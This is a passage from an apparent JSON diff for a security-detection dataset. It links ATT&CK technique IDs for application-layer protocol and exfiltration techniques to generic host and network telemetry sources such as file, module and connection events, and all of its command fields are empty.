"definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1071.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1071.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1048.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
